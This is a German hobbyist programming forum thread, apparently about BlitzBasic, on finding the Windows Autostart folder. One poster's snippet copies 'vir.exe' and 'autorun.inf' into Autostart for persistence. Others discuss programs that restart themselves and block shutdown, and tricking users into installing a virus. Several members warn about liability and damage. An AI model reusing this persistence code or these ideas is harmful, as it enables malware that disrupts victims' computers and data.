Autorun. Wie geht das denn?
Übersicht

![]() |
GeeeckoBetreff: Autorun. Wie geht das denn? |
![]() Antworten mit Zitat ![]() |
---|---|---|
Hallo,
wenn ich eine Autorun in das Startmenü tue, is ja okay. Alles verstehe ich bis hier hin. Aber: Woher weiß ich, wie der Ordner bei den anderen heißt /pfad? mfg. Gaia |
||
![]() |
5k41 |
---|---|---|
hallo!
sry aber ich verstehe deine frage stellung nicht..ich hab mal als mir langweilig war ein kleines prog geschreiben das einen ordner im autostart odrner kopiert vielleicht hilfts dir weiter! Code: [AUSKLAPPEN] le=Len(SystemProperty$("TEMPDIR"))-14 dir$=LSet(SystemProperty$("TEMPDIR"),le) dir=dir+"Startmenü\Programme\Autostart\lol" CreateDir dir JA ich weiss ist gemschiere aber hatte ich noch in meiner code library...muss sich ja mal irgendwie nützlich machen^^ |
||
Projekte:
For a better World - Gesellschaftsspiel ( 100%) User posted image |
Florian |
|
---|---|---|
Code: [AUSKLAPPEN] ;.lib "shell32.dll" ;SHGetSpecialFolderPath%(hwndOwner$,lpszPath*,nFolder%,fCreate%):"SHGetSpecialFolderPathA" Const CSIDL_DESKTOP = 0 Const CSIDL_INTERNET = 1 Const CSIDL_PROGRAMS = 2 Const CSIDL_CONTROLS = 3 Const CSIDL_PRINTERS = 4 Const CSIDL_PERSONAL = 5 Const CSIDL_FAVORITES = 6 Const CSIDL_STARTUP = 7 Const CSIDL_RECENT = 8 Const CSIDL_SENDTO = 9 Const CSIDL_BITBUCKET = 16 Const CSIDL_STARTMENU = 17 Const CSIDL_NETWORK = 18 Const CSIDL_NETHOOD = 19 Const CSIDL_FONTS = 20 Const CSIDL_TEMPLATES = 21 Const CSIDL_COMMON_STARTMENU = 22 Const CSIDL_COMMON_PROGRAMS = 23 Const CSIDL_COMMON_STARTUP = 24 Const CSIDL_COMMON_DESKTOPDIRECTORY = 25 Const CSIDL_APPDATA = 26 Const CSIDL_PRINTHOOD = 27 Const CSIDL_LOCAL_APPDATA = 28 Const CSIDL_ALTSTARTUP = 29 Const CSIDL_COMMON_ALTSTARTUP = 30 Const CSIDL_COMMON_FAVORITES = 31 Const CSIDL_INTERNET_CACHE = 32 Const CSIDL_COOKIES = 33 Const CSIDL_HISTORY = 34 Const CSIDL_COMMON_APPDATA = 35 Const CSIDL_WINDOWS = 36 Const CSIDL_SYSTEM = 37 Const CSIDL_PROGRAM_FILES = 38 Const CSIDL_MYPICTURES = 39 Const CSIDL_PROFILE = 40 Const CSIDL_SYSTEMX86 = 41 Const CSIDL_PROGRAM_FILESX86 = 42 Const CSIDL_PROGRAM_FILES_COMMON = 43 Const CSIDL_PROGRAM_FILES_COMMONX86 = 44 Const CSIDL_COMMON_TEMPLATES = 45 Const CSIDL_COMMON_DOCUMENTS = 46 Const CSIDL_COMMON_ADMINTOOLS = 47 Const CSIDL_ADMINTOOLS = 48 Const CSIDL_CONNECTIONS = 49 Graphics 800,200,0,2 folderbank=CreateBank(1400) SHGetSpecialFolderPath(0, folderbank, CSIDL_STARTUP , 0) Print getbankstring$(folderbank, 1400) WaitKey Function GetBankString$(bank, size) For i=0 To size-1 wert$=wert$ + PeekByte(bank, i) Next While Len(wert$)<>0 If Int(Left$(wert$, 1))>2 Then antwort$=antwort$ + Chr$(Int(Left$(wert$, 2))) wert$=Mid$(wert$, 3) Else antwort$=antwort$ + Chr$(Int(Left$(wert$, 3))) wert$=Mid$(wert$, 4) End If Wend FreeBank bank Return Trim$(antwort$) End Function |
||
![]() |
Geeecko |
---|---|---|
Hallo,
das obere hat mir geholfen... aber das untere? Oo? naja, danke an beide die mir geholfen haben (oder wollten ![]() mdg Gaia |
||
![]() |
Geeecko |
---|---|---|
Was ist an diesem Code falsch?
le=Len(SystemProperty$("TEMPDIR"))-14 dir$=LSet(SystemProperty$("TEMPDIR"),le) dir=dir+"Startmenü\Programme\Autostart\lol" CreateDir dir CopyFile "autorun.inf",""+dir+"\autorun.inf" CopyFile "vir.exe",""+dir+"\rof.exe" End |
||
![]() |
Hip Teen |
---|---|---|
...dass du weder sagst, was der Code machen soll, noch sagst, welches Problem auftritt. | ||
Spruch der Woche: "Ahh, ein neues Gesicht?!" - "Nein, das hab ich schon länger" |
![]() |
5k41 |
---|---|---|
hallo!
erstmal musst du dein problem genauer beschreiben! und dann versteh ich nicht was die autorun.ini da macht... die bracuh man doch nur bei CD's... wenn du einfach meinen urcode nimmst ausführst und deinen rechner neu startest wird dir auffallen das er sofort den ordner LoL öffent->> befindet sich ja im autostart! |
||
Projekte:
For a better World - Gesellschaftsspiel ( 100%) User posted image |
![]() |
Geeecko |
---|---|---|
Ja, das ist mir aufgefallen. 8)
Is doch egal. ![]() Das problem is aber schon behoben ![]() |
||
![]() |
hecticSieger des IS Talentwettbewerb 2006 |
---|---|---|
Vielleich will er Programme schreiben die sich immer gegenseitig starten und somit nicht zu schliessen sind, bis man entsprechende 'Gegensoftware' installiert hat um solch Plagen los zu werden... | ||
![]() |
Geeecko |
---|---|---|
Hey, gar net mal sone schlechte idee ![]() aber da kannste ja im abgeschicherten modus ... oder? ![]() |
||
AvaGast |
![]() Antworten mit Zitat |
|
---|---|---|
Vorallem ist es bestimmt verdammt witzig, solche Software am eigenen Rechner zu testen. Ich sehe ihn dann schon aus dem Inet-Cafe oder von einem Freund aus einen entsprechenden Hilferuf ins Forum posten. ![]() ![]() |
||
![]() |
Geeecko |
---|---|---|
Mit meinem 3Rechnern kann ich dann auch die gegensoftware entwickeln.
muss ich nur noch dann ins prog rein schreiben |
||
![]() |
FireballFlame |
---|---|---|
Ava hat Folgendes geschrieben: Vorallem ist es bestimmt verdammt witzig, solche Software am eigenen Rechner zu testen. Ich sehe ihn dann schon aus dem Inet-Cafe oder von einem Freund aus einen entsprechenden Hilferuf ins Forum posten.
![]() ![]() das hab ich wirklich schon gemacht!!! allerdings 1. nicht mit blitz, sondern mit visual basic 2. braucht man nur 1 programm, das sich selbst startet und 3. muss man einfach nur die datei löschen und die sache ist erledigt! aber anders gehts nicht...sogar das beenden von windows wird verhindert ![]() |
||
PC: Intel Core i7 @ 4x2.93GHz | 6 GB RAM | Nvidia GeForce GT 440 | Desktop 2x1280x1024px | Windows 7 Professional 64bit
Laptop: Intel Core i7 @ 4x2.00GHz | 8 GB RAM | Nvidia GeForce GT 540M | Desktop 1366x768px | Windows 7 Home Premium 64bit |
![]() |
Xalon |
---|---|---|
Du willst also sagen du hast ein Programm geschrieben,in VB,das sich selbst startet (o_O)
Und wie will es das tun wenn es geschlossen wir? ![]() Xalon |
||
>>Besucht doch mal meine Seite,mit NEUEN Tutorials<<
User posted image |
![]() |
x-pressive |
---|---|---|
Zitat: das hab ich wirklich schon gemacht!!!
allerdings 1. nicht mit blitz, sondern mit visual basic 2. braucht man nur 1 programm, das sich selbst startet und 3. muss man einfach nur die datei löschen und die sache ist erledigt! aber anders gehts nicht...sogar das beenden von windows wird verhindert Ich muß mal wieder daran erinnern, das aus solchen Kindereien sehr schnell ein teurer Ernst werden kann. Sollte so ein Programm z.B. auf einen Firmenrechner gelangen und bei einem Absturz des PCs eventuell noch nicht gespeicherte Daten gelöscht werden, kann der Nutzer euch für dadurch entstandene Folgeschäden haftbar machen. Und das könnten in schlimmen Fällen schnell mal viele tausend Euro werden, wenn durch den Datenwegfall z.B. ein Geschäftsabschluss o.ä. verhindert wird. Und das kann auch schon passieren, wenn ihr euer Programm einem ahnungslosen Freund schickt und dessen Vater den PC mitbenutzt. |
||
• BLITZ SHOWCASE:
PARTICLE CANDY • PARTICLE CANDY FOR iPHONE • SPRITE CANDY • DON'T GET ANGRY! 2-3 • CLICK CLACK XL |
![]() |
s_m_w |
---|---|---|
also vir.exe ist schon sehr verdächtig :O | ||
![]() |
Digi_ |
---|---|---|
x-pressive, dazu schreibt man ja, dass man nicht die Verantwortung übernimmt, wenn etwas schief geht (es muss ja nicht beabsichtigt sein). Oder nützt das ewta nichts? | ||
Dreamora |
|
---|---|---|
Digi_ hat Folgendes geschrieben: x-pressive, dazu schreibt man ja, dass man nicht die Verantwortung übernimmt, wenn etwas schief geht (es muss ja nicht beabsichtigt sein). Oder nützt das ewta nichts?
Das ist ziemlich egal. Bei schädigenden Programmen trägt der Schreiber immer die Haftung. Sonst könnte jeder Virenschreiber reinpacken "übernehme keine Haftung". |
||
Ihr findet die aktuellen Projekte unter Gayasoft und könnt mich unter @gayasoft auf Twitter erreichen. |
![]() |
Digi_ |
---|---|---|
Hm, MS schadet User mit Windows, da dieser Sicherheitslöcher hat und sich somit Viren einnisten können. Haftet Microsoft?
... Schlechtes Beispiel, das Virus ist ja nur zum Schaden anrichten gedacht. Aber in Ordnung, ich verstehe was du meinst. Wie ist es denn, wenn sich der User vor dem benutzen der Software einverstanden erklären muss, dass der Schreiber nicht die Haftung trägt? Ansonsten könnte ich ja einige User vom Forum anklagen, einige "Spiele" liessen sich im Fullscreenmodus nicht schliessen, so half nur der Restart. (Damit könnte ich wahrscheinlich auch durchkommen, wenn ich vor dem Start etwas wichtiges gemacht hatte und es nicht gespeichert hatte (z.B. Code für einen Auftrag) |
||
![]() |
Geeecko |
---|---|---|
Sorry für das wieder aufpushen aber da bleibt noch ne frage ![]() Es gibt doch auch websites wo man "OK" eingeben soll (was ich nie mache) kann man dann nicht einfach schreiben gib ma bitte okay ein. wäre das dann auch noch illegal/verboten ne vire rauf zu tuen / andere böse sachen machen zu machen? ![]() |
||
Übersicht